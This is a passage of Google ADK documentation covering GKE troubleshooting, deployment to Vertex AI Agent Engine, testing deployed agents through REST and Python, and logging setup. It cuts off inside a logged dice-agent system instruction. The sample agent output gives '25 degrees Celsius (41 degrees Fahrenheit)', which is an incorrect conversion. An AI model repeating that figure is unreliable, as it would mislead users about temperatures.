user/session IDs and prompt as needed. ```bash curl -X POST $APP_URL/run_sse \ -H "Content-Type: application/json" \ -d '{ "app_name": "capital_agent", "user_id": "user_123", "session_id": "session_abc", "new_message": { "role": "user", "parts": [{ "text": "What is the capital of Canada?" }] }, "streaming": false }' ``` - Set `"streaming": true` if you want to receive Server-Sent Events (SSE). - The response will contain the agent's execution events, including the final answer. ## Troubleshooting These are some common issues you might encounter when deploying your agent to GKE: ### 403 Permission Denied for `Gemini 2.0 Flash` This usually means that the Kubernetes service account does not have the necessary permission to access the Vertex AI API. Ensure that you have created the service account and bound it to the `Vertex AI User` role as described in the [Configure Kubernetes Service Account for Vertex AI](#configure-kubernetes-service-account-for-vertex-ai) section. If you are using AI Studio, ensure that you have set the `GOOGLE_API_KEY` environment variable in the deployment manifest and it is valid. ### 404 or Not Found response This usually means there is an error in your request. Check the application logs to diagnose the problem. ```bash export POD_NAME=$(kubectl get pod -l app=adk-agent -o jsonpath='{.items[0].metadata.name}') kubectl logs $POD_NAME ``` ### Attempt to write a readonly database You might see there is no session id created in the UI and the agent does not respond to any messages. This is usually caused by the SQLite database being read-only. This can happen if you run the agent locally and then create the container image which copies the SQLite database into the container. The database is then read-only in the container. ```bash sqlalchemy.exc.OperationalError: (sqlite3.OperationalError) attempt to write a readonly database [SQL: UPDATE app_states SET state=?, update_time=CURRENT_TIMESTAMP WHERE app_states.app_name = ?] ``` To fix this issue, you can either: Delete the SQLite database file from your local machine before building the container image. This will create a new SQLite database when the container is started. ```bash rm -f sessions.db ``` or (recommended) you can add a `.dockerignore` file to your project directory to exclude the SQLite database from being copied into the container image. .dockerignore ```text sessions.db ``` Build the container image abd deploy the application again. ### Insufficient Permission to Stream Logs `ERROR: (gcloud.builds.submit)` This error can occur when you don't have sufficient permissions to stream build logs, or your VPC-SC security policy restricts access to the default logs bucket. To check the progress of the build, follow the link provided in the error message or navigate to the Cloud Build page in the Google Cloud Console. You can also verify the image was built and pushed to the Artifact Registry using the command under the [Build the container image](#build-the-container-image) section. ### Gemini-2.0-Flash Not Supported in Live Api When using the ADK Dev UI for your deployed agent, text-based chat works, but voice (e.g., clicking the microphone button) fail. You might see a `websockets.exceptions.ConnectionClosedError` in the pod logs indicating that your model is "not supported in the live api". This error occurs because the agent is configured with a model (like `gemini-2.0-flash` in the example) that does not support the Gemini Live API. The Live API is required for real-time, bidirectional streaming of audio and video. ## Cleanup To delete the GKE cluster and all associated resources, run: ```bash gcloud container clusters delete adk-cluster \ --location=$GOOGLE_CLOUD_LOCATION \ --project=$GOOGLE_CLOUD_PROJECT ``` To delete the Artifact Registry repository, run: ```bash gcloud artifacts repositories delete adk-repo \ --location=$GOOGLE_CLOUD_LOCATION \ --project=$GOOGLE_CLOUD_PROJECT ``` You can also delete the project if you no longer need it. This will delete all resources associated with the project, including the GKE cluster, Artifact Registry repository, and any other resources you created. ```bash gcloud projects delete $GOOGLE_CLOUD_PROJECT ``` # Deploy to Vertex AI Agent Engine Supported in ADKPython Google Cloud Vertex AI [Agent Engine](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/overview) is a set of modular services that help developers scale and govern agents in production. The Agent Engine runtime enables you to deploy agents in production with end-to-end managed infrastructure so you can focus on creating intelligent and impactful agents. When you deploy an ADK agent to Agent Engine, your code runs in the *Agent Engine runtime* environment, which is part of the larger set of agent services provided by the Agent Engine product. This guide includes the following deployment paths, which serve different purposes: - **[Standard deployment](/adk-docs/deploy/agent-engine/deploy/)**: Follow this standard deployment path if you have an existing Google Cloud project and if you want to carefully manage deploying an ADK agent to the Agent Engine runtime. This deployment path uses Cloud Console, ADK command line interface, and provides step-by-step instructions. This path is recommended for users who are already familiar with configuring Google Cloud projects, and users preparing for production deployments. - **[Agent Starter Pack deployment](/adk-docs/deploy/agent-engine/asp/)**: Follow this accelerated deployment path if you do not have an existing Google Cloud project and are creating a project specifically for development and testing. The Agent Starter Pack (ASP) helps you deploy ADK projects quickly and it configures Google Cloud services that are not strictly necessary for running an ADK agent with the Agent Engine runtime. Agent Engine service on Google Cloud Agent Engine is a paid service and you may incur costs if you go above the no-cost access tier. More information can be found on the [Agent Engine pricing page](https://cloud.google.com/vertex-ai/pricing#vertex-ai-agent-engine). ## Deployment payload When you deploy your ADK agent project to Agent Engine, the following content is uploaded to the service: - Your ADK agent code - Any dependencies declared in your ADK agent code The deployment *does not* include the ADK API server or the ADK web user interface libraries. The Agent Engine service provides the libraries for ADK API server functionality. # Deploy to Agent Engine with Agent Starter Pack Supported in ADKPython This deployment procedure describes how to perform a deployment using the [Agent Starter Pack](https://github.com/GoogleCloudPlatform/agent-starter-pack) (ASP) and the ADK command line interface (CLI) tool. Using ASP for deployment to the Agent Engine runtime is an accelerated path, and you should use it for **development and testing** only. The ASP tool configures Google Cloud resources that are not strictly necessary for running an ADK agent workflow, and you should thoroughly review that configuration before using it in a production deployment. This deployment guide uses the ASP tool to apply a project template to your existing project, add deployment artifacts, and prepare your agent project for deployment. These instructions show you how to use ASP to provision a Google Cloud project with services needed for deploying your ADK project, as follows: - [Prerequisites](#prerequisites-ad): Setup Google Cloud account, a project, and install required software. - [Prepare your ADK project](#prepare-ad): Modify your existing ADK project files to get ready for deployment. - [Connect to your Google Cloud project](#connect-ad): Connect your development environment to Google Cloud and your Google Cloud project. - [Deploy your ADK project](#deploy-ad): Provision required services in your Google Cloud project and upload your ADK project code. For information on testing a deployed agent, see [Test deployed agent](https://google.github.io/adk-docs/deploy/agent-engine/test/index.md). For more information on using Agent Starter Pack and its command line tools, see the [CLI reference](https://googlecloudplatform.github.io/agent-starter-pack/cli/enhance.html) and [Development guide](https://googlecloudplatform.github.io/agent-starter-pack/guide/development-guide.html). ### Prerequisites You need the following resources configured to use this deployment path: - **Google Cloud account**: with administrator access to the following: - **Google Cloud Project**: An empty Google Cloud project with [billing enabled](https://cloud.google.com/billing/docs/how-to/modify-project). For information on creating projects, see [Creating and managing projects](https://cloud.google.com/resource-manager/docs/creating-managing-projects). - **Python Environment**: A Python version supported by the [ASP project](https://googlecloudplatform.github.io/agent-starter-pack/guide/getting-started.html). - **uv Tool:** Manage Python development environment and running ASP tools. For installation details, see [Install uv](https://docs.astral.sh/uv/getting-started/installation/). - **Google Cloud CLI tool**: The gcloud command line interface. For installation details, see [Google Cloud Command Line Interface](https://cloud.google.com/sdk/docs/install). - **Make tool**: Build automation tool. This tool is part of most Unix-based systems, for installation details, see the [Make tool](https://www.gnu.org/software/make/) documentation. ### Prepare your ADK project When you deploy an ADK project to Agent Engine, you need some additional files to support the deployment operation. The following ASP command backs up your project and then adds files to your project for deployment purposes. These instructions assume you have an existing ADK project that you are modifying for deployment. If you do not have an ADK project, or want to use a test project, complete the Python [Quickstart](/adk-docs/get-started/quickstart/) guide, which creates a [multi_tool_agent](https://github.com/google/adk-docs/tree/main/examples/python/snippets/get-started/multi_tool_agent) project. The following instructions use the `multi_tool_agent` project as an example. To prepare your ADK project for deployment to Agent Engine: 1. In a terminal window of your development environment, navigate to the **parent directory** that contains your agent folder. For example, if your project structure is: ```text your-project-directory/ ├── multi_tool_agent/ │ ├── __init__.py │ ├── agent.py │ └── .env ``` Navigate to `your-project-directory/` 1. Run the ASP `enhance` command to add the files required for deployment into your project. ```shell uvx agent-starter-pack enhance --adk -d agent_engine ``` 1. Follow the instructions from the ASP tool. In general, you can accept the default answers to all questions. However for the **GCP region**, option, make sure you select one of the [supported regions](https://docs.cloud.google.com/agent-builder/locations#supported-regions-agent-engine) for Agent Engine. When you successfully complete this process, the tool shows the following message: ```text > Success! Your agent project is ready. ``` Note The ASP tool may show a reminder to connect to Google Cloud while running, but that connection is *not required* at this stage. For more information about the changes ASP makes to your ADK project, see [Changes to your ADK project](#adk-asp-changes). ### Connect to your Google Cloud project Before you deploy your ADK project, you must connect to Google Cloud and your project. After logging into your Google Cloud account, you should verify that your deployment target project is visible from your account and that it is configured as your current project. To connect to Google Cloud and list your project: 1. In a terminal window of your development environment, login to your Google Cloud account: ```shell gcloud auth application-default login ``` 1. Set your target project using the Google Cloud Project ID: ```shell gcloud config set project your-project-id-xxxxx ``` 1. Verify your Google Cloud target project is set: ```shell gcloud config get-value project ``` Once you have successfully connected to Google Cloud and set your Cloud Project ID, you are ready to deploy your ADK project files to Agent Engine. ### Deploy your ADK project When using the ASP tool, you deploy in stages. In the first stage, you run a `make` command that provisions the services needed to run your ADK workflow on Agent Engine. In the second stage, the tool uploads your project code to the Agent Engine service and runs it in the hosted environment Important *Make sure your Google Cloud target deployment project is set as your* **current project** *before performing these steps*. The `make backend` command uses your currently set Google Cloud project when it performs a deployment. For information on setting and checking your current project, see [Connect to your Google Cloud project](#connect-ad). To deploy your ADK project to Agent Engine in your Google Cloud project: 1. In a terminal window, ensure you are in the parent directory (e.g., `your-project-directory/`) that contains your agent folder. 1. Deploy the code from the updated local project into the Google Cloud development environment, by running the following ASP make command: ```shell make backend ``` Once this process completes successfully, you should be able to interact with the agent running on Google Cloud Agent Engine. For details on testing the deployed agent, see [Test deployed agent](/adk-docs/deploy/agent-engine/test/). ### Changes to your ADK project The ASP tools add more files to your project for deployment. The procedure below backs up your existing project files before modifying them. This guide uses the [multi_tool_agent](https://github.com/google/adk-docs/tree/main/examples/python/snippets/get-started/multi_tool_agent) project as a reference example. The original project has the following file structure to start with: ```text multi_tool_agent/ ├─ __init__.py ├─ agent.py └─ .env ``` After running the ASP enhance command to add Agent Engine deployment information, the new structure is as follows: ```text multi-tool-agent/ ├─ app/ # Core application code │ ├─ agent.py # Main agent logic │ ├─ agent_engine_app.py # Agent Engine application logic │ └─ utils/ # Utility functions and helpers ├─ .cloudbuild/ # CI/CD pipeline configurations for Google Cloud Build ├─ deployment/ # Infrastructure and deployment scripts ├─ notebooks/ # Jupyter notebooks for prototyping and evaluation ├─ tests/ # Unit, integration, and load tests ├─ Makefile # Makefile for common commands ├─ GEMINI.md # AI-assisted development guide └─ pyproject.toml # Project dependencies and configuration ``` See the *README.md* file in your updated ADK project folder for more information. For more information on using Agent Starter Pack, see the [Development guide](https://googlecloudplatform.github.io/agent-starter-pack/guide/development-guide.html). ## Test deployed agents After completing deployment of your ADK agent you should test the workflow in its new hosted environment. For more information on testing an ADK agent deployed to Agent Engine, see [Test deployed agents in Agent Engine](/adk-docs/deploy/agent-engine/test/). # Deploy to Vertex AI Agent Engine Supported in ADKPython This deployment procedure describes how to perform a standard deployment of ADK agent code to Google Cloud [Agent Engine](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/overview). You should follow this deployment path if you have an existing Google Cloud project and if you want to carefully manage deploying an ADK agent to Agent Engine runtime environment. These instructions use Cloud Console, the gcloud command line interface, and the ADK command line interface (ADK CLI). This path is recommended for users who are already familiar with configuring Google Cloud projects, and users preparing for production deployments. These instructions describe how to deploy an ADK project to Google Cloud Agent Engine runtime environment, which includes the following stages: - [Setup Google Cloud project](#setup-cloud-project) - [Prepare agent project folder](#define-your-agent) - [Deploy the agent](#deploy-agent) ## Setup Google Cloud project To deploy your agent to Agent Engine, you need a Google Cloud project: 1. **Sign into Google Cloud**: - If you're an **existing user** of Google Cloud: - Sign in via - If you previously used a Free Trial that has expired, you may need to upgrade to a [Paid billing account](https://docs.cloud.google.com/free/docs/free-cloud-features#how-to-upgrade). - If you are a **new user** of Google Cloud: - You can sign up for the [Free Trial program](https://docs.cloud.google.com/free/docs/free-cloud-features). The Free Trial gets you a $300 Welcome credit to spend over 91 days on various [Google Cloud products](https://docs.cloud.google.com/free/docs/free-cloud-features#during-free-trial) and you won't be billed. During the Free Trial, you also get access to the [Google Cloud Free Tier](https://docs.cloud.google.com/free/docs/free-cloud-features#free-tier), which gives you free usage of select products up to specified monthly limits, and to product-specific free trials. 1. **Create a Google Cloud project** - If you already have an existing Google Cloud project, you can use it, but be aware this process is likely to add new services to the project. - If you want to create a new Google Cloud project, you can create a new one on the [Create Project](https://console.cloud.google.com/projectcreate) page. 1. **Get your Google Cloud Project ID** - You need your Google Cloud Project ID, which you can find on your GCP homepage. Make sure to note the Project ID (alphanumeric with hyphens), *not* the project number (numeric). 1. **Enable Vertex AI in your project** - To use Agent Engine, you need to [enable the Vertex AI API](https://console.cloud.google.com/apis/library/aiplatform.googleapis.com). Click on the "Enable" button to enable the API. Once enabled, it should say "API Enabled". 1. **Enable Cloud Resource Manager API in your project** - To use Agent Engine, you need to [enable the Cloud Resource Manager API](https://console.developers.google.com/apis/api/cloudresourcemanager.googleapis.com/overview). Click on the "Enable" button to enable the API. Once enabled, it should say "API Enabled". ## Set up your coding environment Now that you prepared your Google Cloud project, you can return to your coding environment. These steps require access to a terminal within your coding environment to run command line instructions. ### Authenticate your coding environment with Google Cloud - You need to authenticate your coding environment so that you and your code can interact with Google Cloud. To do so, you need the gcloud CLI. If you have never used the gcloud CLI, you need to first [download and install it](https://docs.cloud.google.com/sdk/docs/install-sdk) before continuing with the steps below: - Run the following command in your terminal to access your Google Cloud project as a user: ```shell gcloud auth login ``` After authenticating, you should see the message `You are now authenticated with the gcloud CLI!`. - Run the following command to authenticate your code so that it can work with Google Cloud: ```shell gcloud auth application-default login ``` After authenticating, you should see the message `You are now authenticated with the gcloud CLI!`. - (Optional) If you need to set or change your default project in gcloud, you can use: ```shell gcloud config set project MY-PROJECT-ID ``` ### Define your agent With your Google Cloud and coding environment prepared, you're ready to deploy your agent. The instructions assume that you have an agent project folder, such as: ```shell multi_tool_agent/ ├── .env ├── __init__.py └── agent.py ``` For more details on the project files and format, see the [multi_tool_agent](https://github.com/google/adk-docs/tree/main/examples/python/snippets/get-started/multi_tool_agent) code sample. ## Deploy the agent You can deploy from your terminal using the `adk deploy` command line tool. This process packages your code, builds it into a container, and deploys it to the managed Agent Engine service. This process can take several minutes. The following example deploy command uses the `multi_tool_agent` sample code as the project to be deployed: ```shell PROJECT_ID=my-project-id LOCATION_ID=us-central1 adk deploy agent_engine \ --project=$PROJECT_ID \ --region=$LOCATION_ID \ --display_name="My First Agent" \ multi_tool_agent ``` For `region`, you can find a list of the supported regions on the [Vertex AI Agent Builder locations page](https://docs.cloud.google.com/agent-builder/locations#supported-regions-agent-engine). To learn about the CLI options for the `adk deploy agent_engine` command, see the [ADK CLI Reference](https://google.github.io/adk-docs/api-reference/cli/cli.html#adk-deploy-agent-engine). ### Deploy command output Once successfully deployed, you should see the following output: ```shell Creating AgentEngine Create AgentEngine backing LRO: projects/123456789/locations/us-central1/reasoningEngines/751619551677906944/operations/2356952072064073728 View progress and logs at https://console.cloud.google.com/logs/query?project=hopeful-sunset-478017-q0 AgentEngine created. Resource name: projects/123456789/locations/us-central1/reasoningEngines/751619551677906944 To use this AgentEngine in another session: agent_engine = vertexai.agent_engines.get('projects/123456789/locations/us-central1/reasoningEngines/751619551677906944') Cleaning up the temp folder: /var/folders/k5/pv70z5m92s30k0n7hfkxszfr00mz24/T/agent_engine_deploy_src/20251219_134245 ``` Note that you now have a `RESOURCE_ID` where your agent has been deployed (which in the example above is `751619551677906944`). You need this ID number along with the other values to use your agent on Agent Engine. ## Using an agent on Agent Engine Once you have completed deployment of your ADK project, you can query the agent using the Vertex AI SDK, Python requests library, or a REST API client. This section provides some information on what you need to interact with your agent and how to construct URLs to interact with your agent's REST API. To interact with your agent on Agent Engine, you need the following: - **PROJECT_ID** (example: "my-project-id") which you can find on your [project details page](https://console.cloud.google.com/iam-admin/settings) - **LOCATION_ID** (example: "us-central1"), that you used to deploy your agent - **RESOURCE_ID** (example: "751619551677906944"), which you can find on the [Agent Engine UI](https://console.cloud.google.com/vertex-ai/agents/agent-engines) The query URL structure is as follows: ```shell https://$(LOCATION_ID)-aiplatform.googleapis.com/v1/projects/$(PROJECT_ID)/locations/$(LOCATION_ID)/reasoningEngines/$(RESOURCE_ID):query ``` You can make requests from your agent using this URL structure. For more information on how to make requests, see the instructions in the Agent Engine documentation [Use an Agent Development Kit agent](https://docs.cloud.google.com/agent-builder/agent-engine/use/adk#rest-api). You can also check the Agent Engine documentation to learn about how to manage your [deployed agent](https://docs.cloud.google.com/agent-builder/agent-engine/manage/overview). For more information on testing and interacting with a deployed agent, see [Test deployed agents in Agent Engine](/adk-docs/deploy/agent-engine/test/). ### Monitoring and verification - You can monitor the deployment status in the [Agent Engine UI](https://console.cloud.google.com/vertex-ai/agents/agent-engines) in the Google Cloud Console. - For additional details, you can visit the Agent Engine documentation [deploying an agent](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/deploy) and [managing deployed agents](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/manage/overview). ## Test deployed agents After completing deployment of your ADK agent you should test the workflow in its new hosted environment. For more information on testing an ADK agent deployed to Agent Engine, see [Test deployed agents in Agent Engine](/adk-docs/deploy/agent-engine/test/). # Test deployed agents in Agent Engine These instructions explain how to test an ADK agent deployed to the [Agent Engine](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/overview) runtime environment. Before using these instructions, you need to have completed the deployment of your agent to the Agent Engine runtime environment using one of the [available methods](/adk-docs/deploy/agent-engine/). This guide shows you how to view, interact, and test your deployed agent through the Google Cloud Console, and interact with the agent using REST API calls or the Vertex AI SDK for Python. ## View deployed agent in Cloud Console To view your deployed agent in the Cloud Console: - Navigate to the Agent Engine page in the Google Cloud Console: This page lists all deployed agents in your currently selected Google Cloud project. If you do not see your agent listed, make sure you have your target project selected in Google Cloud Console. For more information on selecting an existing Google Cloud project, see [Creating and managing projects](https://cloud.google.com/resource-manager/docs/creating-managing-projects#identifying_projects). ## Find Google Cloud project information You need the address and resource identification for your project (`PROJECT_ID`, `LOCATION_ID`, `RESOURCE_ID`) to be able to test your deployment. You can use Cloud Console or the `gcloud` command line tool to find this information. Vertex AI express mode API key If you are using Vertex AI express mode, you can skip this step and use your API key. To find your project information with Google Cloud Console: 1. In the Google Cloud Console, navigate to the Agent Engine page: 1. At the top of the page, select **API URLs**, and then copy the **Query URL** string for your deployed agent, which should be in this format: ```text https://$(LOCATION_ID)-aiplatform.googleapis.com/v1/projects/$(PROJECT_ID)/locations/$(LOCATION_ID)/reasoningEngines/$(RESOURCE_ID):query ``` To find your project information with the `gcloud` command line tool: 1. In your development environment, make sure you are authenticated to Google Cloud and run the following command to list your project: ```shell gcloud projects list ``` 1. With the Project ID you used for deployment, run this command to get the additional details: ```shell gcloud asset search-all-resources \ --scope=projects/$(PROJECT_ID) \ --asset-types='aiplatform.googleapis.com/ReasoningEngine' \ --format="table(name,assetType,location,reasoning_engine_id)" ``` ## Test using REST calls A simple way to interact with your deployed agent in Agent Engine is to use REST calls with the `curl` tool. This section describes how to check your connection to the agent and also to test processing of a request by the deployed agent. ### Check connection to agent You can check your connection to the running agent using the **Query URL** available in the Agent Engine section of the Cloud Console. This check does not execute the deployed agent, but returns information about the agent. To send a REST call and get a response from deployed agent: - In a terminal window of your development environment, build a request and execute it: ```shell curl -X GET \ -H "Authorization: Bearer $(gcloud auth print-access-token)" \ "https://$(LOCATION_ID)-aiplatform.googleapis.com/v1/projects/$(PROJECT_ID)/locations/$(LOCATION_ID)/reasoningEngines" ``` ```shell curl -X GET \ -H "x-goog-api-key:YOUR-EXPRESS-MODE-API-KEY" \ "https://aiplatform.googleapis.com/v1/reasoningEngines" ``` If your deployment was successful, this request responds with a list of valid requests and expected data formats. Remove `:query` parameter for connection URL If you use the **Query URL** available in the Agent Engine section of the Cloud Console, make sure to remove the `:query` parameter from end of the address. Access for agent connections This connection test requires the calling user has a valid access token for the deployed agent. When testing from other environments, make sure the calling user has access to connect to the agent in your Google Cloud project. ### Send an agent request When getting responses from your agent project, you must first create a session, receive a Session ID, and then send your requests using that Session ID. This process is described in the following instructions. To test interaction with the deployed agent via REST: 1. In a terminal window of your development environment, create a session by building a request using this template: ```shell curl \ -H "Authorization: Bearer $(gcloud auth print-access-token)" \ -H "Content-Type: application/json" \ https://$(LOCATION_ID)-aiplatform.googleapis.com/v1/projects/$(PROJECT_ID)/locations/$(LOCATION_ID)/reasoningEngines/$(RESOURCE_ID):query \ -d '{"class_method": "async_create_session", "input": {"user_id": "u_123"},}' ``` ```shell curl \ -H "x-goog-api-key:YOUR-EXPRESS-MODE-API-KEY" \ -H "Content-Type: application/json" \ https://aiplatform.googleapis.com/v1/reasoningEngines/$(RESOURCE_ID):query \ -d '{"class_method": "async_create_session", "input": {"user_id": "u_123"},}' ``` 1. In the response from the previous command, extract the created **Session ID** from the **id** field: ```json { "output": { "userId": "u_123", "lastUpdateTime": 1757690426.337745, "state": {}, "id": "4857885913439920384", # Session ID "appName": "9888888855577777776", "events": [] } } ``` 1. In a terminal window of your development environment, send a message to your agent by building a request using this template and the Session ID created in the previous step: ```shell curl \ -H "Authorization: Bearer $(gcloud auth print-access-token)" \ -H "Content-Type: application/json" \ https://$(LOCATION_ID)-aiplatform.googleapis.com/v1/projects/$(PROJECT_ID)/locations/$(LOCATION_ID)/reasoningEngines/$(RESOURCE_ID):query?alt=sse -d '{ "class_method": "async_stream_query", "input": { "user_id": "u_123", "session_id": "4857885913439920384", "message": "Hey whats the weather in new york today?", } }' ``` ```shell curl \ -H "x-goog-api-key:YOUR-EXPRESS-MODE-API-KEY" \ -H "Content-Type: application/json" \ https://aiplatform.googleapis.com/v1/reasoningEngines/$(RESOURCE_ID):query?alt=sse -d '{ "class_method": "async_stream_query", "input": { "user_id": "u_123", "session_id": "4857885913439920384", "message": "Hey whats the weather in new york today?", } }' ``` This request should generate a response from your deployed agent code in JSON format. For more information about interacting with a deployed ADK agent in Agent Engine using REST calls, see [Manage deployed agents](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/manage/overview#console) and [Use an Agent Development Kit agent](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/use/adk) in the Agent Engine documentation. ## Test using Python You can use Python code for more sophisticated and repeatable testing of your agent deployed in Agent Engine. These instructions describe how to create a session with the deployed agent, and then send a request to the agent for processing. ### Create a remote session Use the `remote_app` object to create a connection to a deployed, remote agent: ```py # If you are in a new script or used the ADK CLI to deploy, you can connect like this: # remote_app = agent_engines.get("your-agent-resource-name") remote_session = await remote_app.async_create_session(user_id="u_456") print(remote_session) ``` Expected output for `create_session` (remote): ```console {'events': [], 'user_id': 'u_456', 'state': {}, 'id': '7543472750996750336', 'app_name': '7917477678498709504', 'last_update_time': 1743683353.030133} ``` The `id` value is the session ID, and `app_name` is the resource ID of the deployed agent on Agent Engine. #### Send queries to your remote agent ```py async for event in remote_app.async_stream_query( user_id="u_456", session_id=remote_session["id"], message="whats the weather in new york", ): print(event) ``` Expected output for `async_stream_query` (remote): ```console {'parts': [{'function_call': {'id': 'af-f1906423-a531-4ecf-a1ef-723b05e85321', 'args': {'city': 'new york'}, 'name': 'get_weather'}}], 'role': 'model'} {'parts': [{'function_response': {'id': 'af-f1906423-a531-4ecf-a1ef-723b05e85321', 'name': 'get_weather', 'response': {'status': 'success', 'report': 'The weather in New York is sunny with a temperature of 25 degrees Celsius (41 degrees Fahrenheit).'}}}], 'role': 'user'} {'parts': [{'text': 'The weather in New York is sunny with a temperature of 25 degrees Celsius (41 degrees Fahrenheit).'}], 'role': 'model'} ``` For more information about interacting with a deployed ADK agent in Agent Engine, see [Manage deployed agents](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/manage/overview) and [Use a Agent Development Kit agent](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/use/adk) in the Agent Engine documentation. ### Sending Multimodal Queries To send multimodal queries (e.g., including images) to your agent, you can construct the `message` parameter of `async_stream_query` with a list of `types.Part` objects. Each part can be text or an image. To include an image, you can use `types.Part.from_uri`, providing a Google Cloud Storage (GCS) URI for the image. ```python from google.genai import types image_part = types.Part.from_uri( file_uri="gs://cloud-samples-data/generative-ai/image/scones.jpg", mime_type="image/jpeg", ) text_part = types.Part.from_text( text="What is in this image?", ) async for event in remote_app.async_stream_query( user_id="u_456", session_id=remote_session["id"], message=[text_part, image_part], ): print(event) ``` Note While the underlying communication with the model may involve Base64 encoding for images, the recommended and supported method for sending image data to an agent deployed on Agent Engine is by providing a GCS URI. ## Clean up deployments If you have performed deployments as tests, it is a good practice to clean up your cloud resources after you have finished. You can delete the deployed Agent Engine instance to avoid any unexpected charges on your Google Cloud account. ```python remote_app.delete(force=True) ``` The `force=True` parameter also deletes any child resources that were generated from the deployed agent, such as sessions. You can also delete your deployed agent via the [Agent Engine UI](https://console.cloud.google.com/vertex-ai/agents/agent-engines) on Google Cloud. # Observability for agents Observability for agents enables measurement of a system's internal state, including reasoning traces, tool calls, and latent model outputs, by analyzing its external telemetry and structured logs. When building agents, you may need these features to help debug and diagnose their in-process behavior. Basic input and output monitoring is typically insufficient for agents with any significant level of complexity. Agent Development Kit (ADK) provides configurable [logging](/adk-docs/observability/logging/) functionality for monitoring and debugging agents. However, you may need to consider more advanced [observability ADK Integrations](/adk-docs/integrations/?topic=observability) for monitoring and analysis. ADK Integrations for observability For a list of pre-built observability libraries for ADK, see [Tools and Integrations](/adk-docs/integrations/?topic=observability). # Agent activity logging Supported in ADKPython v0.1.0TypeScript v0.2.0Go v0.1.0Java v0.1.0 Agent Development Kit (ADK) uses Python's standard `logging` module to provide flexible and powerful logging capabilities. Understanding how to configure and interpret these logs is crucial for monitoring agent behavior and debugging issues effectively. ## Logging Philosophy ADK's approach to logging is to provide detailed diagnostic information without being overly verbose by default. It is designed to be configured by the application developer, allowing you to tailor the log output to your specific needs, whether in a development or production environment. - **Standard Library:** It uses the standard `logging` library, so any configuration or handler that works with it will work with ADK. - **Hierarchical Loggers:** Loggers are named hierarchically based on the module path (e.g., `google_adk.google.adk.agents.llm_agent`), allowing for fine-grained control over which parts of the framework produce logs. - **User-Configured:** The framework does not configure logging itself. It is the responsibility of the developer using the framework to set up the desired logging configuration in their application's entry point. ## How to Configure Logging You can configure logging in your main application script (e.g., `main.py`) before you initialize and run your agent. The simplest way is to use `logging.basicConfig`. ### Example Configuration To enable detailed logging, including `DEBUG` level messages, add the following to the top of your script: ```python import logging logging.basicConfig( level=logging.DEBUG, format='%(asctime)s - %(levelname)s - %(name)s - %(message)s' ) # Your ADK agent code follows... # from google.adk.agents import LlmAgent # ... ``` ### Configuring Logging with the ADK CLI When running agents using the ADK's built-in web or API servers, you can easily control the log verbosity directly from the command line. The `adk web`, `adk api_server`, and `adk deploy cloud_run` commands all accept a `--log_level` option. This provides a convenient way to set the logging level without modifying your agent's source code. > **Note:** The command-line setting always takes precedence over the programmatic configuration (like `logging.basicConfig`) for ADK's loggers. It's recommended to use `INFO` or `WARNING` in production and enable `DEBUG` only when troubleshooting. **Example using `adk web`:** To start the web server with `DEBUG` level logging, run: ```bash adk web --log_level DEBUG path/to/your/agents_dir ``` The available log levels for the `--log_level` option are: - `DEBUG` - `INFO` (default) - `WARNING` - `ERROR` - `CRITICAL` > You can also use `-v` or `--verbose` as a shortcut for `--log_level DEBUG`. > > ```bash > adk web -v path/to/your/agents_dir > ``` ### Log Levels ADK uses standard log levels to categorize messages. The configured level determines what information gets logged. | Level | Description | Type of Information Logged | | ------------- | ---------------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | **`DEBUG`** | **Crucial for debugging.** The most verbose level for fine-grained diagnostic information. | - **Full LLM Prompts:** The complete request sent to the language model, including system instructions, history, and tools. - Detailed API responses from services. - Internal state transitions and variable values. | | **`INFO`** | General information about the agent's lifecycle. | - Agent initialization and startup. - Session creation and deletion events. - Execution of a tool, including its name and arguments. | | **`WARNING`** | Indicates a potential issue or deprecated feature use. The agent continues to function, but attention may be required. | - Use of deprecated methods or parameters. - Non-critical errors that the system recovered from. | | **`ERROR`** | A serious error that prevented an operation from completing. | - Failed API calls to external services (e.g., LLM, Session Service). - Unhandled exceptions during agent execution. - Configuration errors. | > **Note:** It is recommended to use `INFO` or `WARNING` in production environments. Only enable `DEBUG` when actively troubleshooting an issue, as `DEBUG` logs can be very verbose and may contain sensitive information. ## Reading and Understanding the Logs The `format` string in the `basicConfig` example determines the structure of each log message. Here’s a sample log entry: ```text 2025-07-08 11:22:33,456 - DEBUG - google_adk.google.adk.models.google_llm - LLM Request: contents { ... } ``` | Log Segment | Format Specifier | Meaning | | ------------------------------- | ---------------- | ---------------------------------------------- | | `2025-07-08 11:22:33,456` | `%(asctime)s` | Timestamp | | `DEBUG` | `%(levelname)s` | Severity level | | `google_adk.models.google_llm` | `%(name)s` | Logger name (the module that produced the log) | | `LLM Request: contents { ... }` | `%(message)s` | The actual log message | By reading the logger name, you can immediately pinpoint the source of the log and understand its context within the agent's architecture. ## Debugging with Logs: A Practical Example **Scenario:** Your agent is not producing the expected output, and you suspect the prompt being sent to the LLM is incorrect or missing information. **Steps:** 1. **Enable DEBUG Logging:** In your `main.py`, set the logging level to `DEBUG` as shown in the configuration example. ```python logging.basicConfig( level=logging.DEBUG, format='%(asctime)s - %(levelname)s - %(name)s - %(message)s' ) ``` 1. **Run Your Agent:** Execute your agent's task as you normally would. 1. **Inspect the Logs:** Look through the console output for a message from the `google.adk.models.google_llm` logger that starts with `LLM Request:`. ```text ... 2025-07-10 15:26:13,778 - DEBUG - google_adk.google.adk.models.google_llm - Sending out request, model: gemini-2.0-flash, backend: GoogleLLMVariant.GEMINI_API, stream: False 2025-07-10 15:26:13,778 - DEBUG - google_adk.google.adk.models.google_llm - LLM Request: ----------------------------------------------------------- System Instruction: You roll dice and answer questions about the outcome of the dice rolls. You can roll dice of different sizes. You can use multiple tools in parallel by calling functions in parallel(in one request and in one round). It is ok to discuss previous dice roles, and comment on the dice rolls. When you are asked to roll a die, you must call the roll_die tool with the number of sides. Be sure to pass in an integer. Do not pass in a string. You should never roll a die on your own. When checking prime numbers, call the check_prime tool with a list of integers. Be sure to pass in a list of integers. You 